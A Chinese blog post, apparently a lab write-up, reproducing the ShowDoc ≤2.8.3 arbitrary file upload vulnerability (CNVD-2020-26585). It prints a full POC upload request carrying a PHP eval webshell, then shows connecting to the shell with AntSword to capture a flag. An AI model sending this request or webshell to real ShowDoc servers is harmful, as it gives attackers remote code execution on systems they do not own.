当前位置: 首页 > article >正文

漏洞复现-showdoc文件上传_v2.8.3_(CNVD-2020-26585)

article 2024/11/13 14:04:50

showdoc文件上传_v2.8.3_CNVD-2020-26585

漏洞信息

  • showdoc 2.8.3 以下版本中存在安全漏洞
  • CNVD-2020-26585
  • 文件上传漏洞

描述

ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文件上传.

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

进入首页,然后刷新bp抓包

image-20231027113429220

image-20231027113444959

构造POC

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 10.9.47.6:14881
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 267

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo 'hello!!!';@eval($_POST[999])?>
----------------------------921378126371623762173617--

send发送发现返回结果成功

image-20231027113536701

将url复制过来

http:\/\/10.9.47.6:14881\/Public\/Uploads\/2023-10-27\/653ba0094f4e4.php

然后剔除掉所有的反斜线,使用蚁剑连接

image-20231027113631880

获取flag

image-20231027113652422


http://www.kler.cn/a/108784.html

相关文章:

  • xrandr源码分析
  • 算法训练(leetcode)二刷第二十三天 | 455. 分发饼干、*376. 摆动序列、53. 最大子数组和
  • Redis主从复制(replication)
  • 问:MySQL主从同步的机制梳理?
  • HTML(超文本标记语言)
  • 力扣每日一题 3258. 统计满足 K 约束的子字符串数量 I
  • Python环境下LaTeX数学公式转图像方案调研与探讨
  • 【大数据Hive】hive 表数据优化使用详解
  • 西工大CSAPP第二章课后题2.55答案及解析
  • 什么是程序化交易
  • 计算机网络--第一次作业
  • C51--PWN-舵机控制
  • 直线模组怎么分类?
  • 在JS中,var 、let 、const 总结
  • ENSP L2TP 配置
  • springboot 配置文件加载顺序
  • 微信小程序vue+uniapp旅游景点门票预订系统 名胜风景推荐系统
  • End-to-End Adversarial-Attention Network for Multi-Modal Clustering
  • leetCode 260.只出现一次的数字 ||| + 位运算
  • 这个故事有点长 - 舟山
  • 洛谷 B2135:单词替换
  • 2022年上半年上午易错题(软件设计师考试)
  • 信息检索与数据挖掘 | 【实验】排名检索模型
  • Cesium弹窗可随地图移动
  • 神经网络与深度学习第四章前馈神经网络习题解答
  • 搞定蓝牙-第六篇(HID